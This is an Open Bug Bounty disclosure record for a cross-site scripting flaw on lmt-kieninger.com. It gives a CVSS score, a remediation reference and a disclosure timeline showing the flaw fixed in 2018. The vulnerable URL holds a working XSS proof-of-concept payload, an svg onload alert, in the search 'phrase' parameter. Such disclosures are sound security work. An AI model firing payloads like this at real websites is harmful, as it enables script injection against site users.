lmt-kieninger.com XSS vulnerability

2017-11-11T22:19:00
ID OBB:410658
Type openbugbounty
Reporter badmaxx
Modified 2018-02-10T14:32:00

Description

Open Bug Bounty ID: OBB-410658

Description| Value
---|---
Affected Website:| lmt-kieninger.com
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://www.lmt-kieninger.com/search/?tx_lmt_pi[__referrer][%40extension]=Lmt&tx_lmt_pi[__referrer][%40controller]=Banner&tx_lmt_pi[__referrer][%40action]=searchForm&tx_lmt_pi[__referrer][arguments]=YTowOnt9139ea3e889aaa86e51f6f26d1612491d04a1b2b4&tx_lmt_pi[__referrer][%40request]=a%3A3%3A{s%3A10%3A%22%40extension%22%3Bs%3A3%3A%22Lmt%22%3Bs%3A11%3A%22%40controller%22%3Bs%3A6%3A%22Banner%22%3Bs%3A7%3A%22%40action%22%3Bs%3A10%3A%22searchForm%22%3B}bf0f9361cd64c686006dfbc687f78488eca0fd15&tx_lmt_pi[__trustedProperties]=a%3A1%3A{s%3A6%3A%22phrase%22%3Bi%3A1%3B}2d6fb36d9ced9abaf1cc08d6f3966a4d3b64b763&tx_lmt_pi[phrase]=%22%3Eblub%3Csvg%2Fonload%3Dalert(%2FOPENBUGBOUNTY%2F)%3E%22%3Eblub%3Csvg%2Fonload%3Dalert(%2FOPENBUGBOUNTY%2F)%3E&no_cache=1

Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 11 November, 2017 22:19 GMT
Vulnerability Verified:| 11 November, 2017 22:22 GMT
Website Operator Notified:| 11 November, 2017 22:22 GMT
Vulnerability Published:| 11 November, 2017 22:22 GMT [without any technical details]
Vulnerability Fixed:| 10 February, 2018 14:32 GMT
Public Disclosure:| 10 February, 2018 14:32 GMT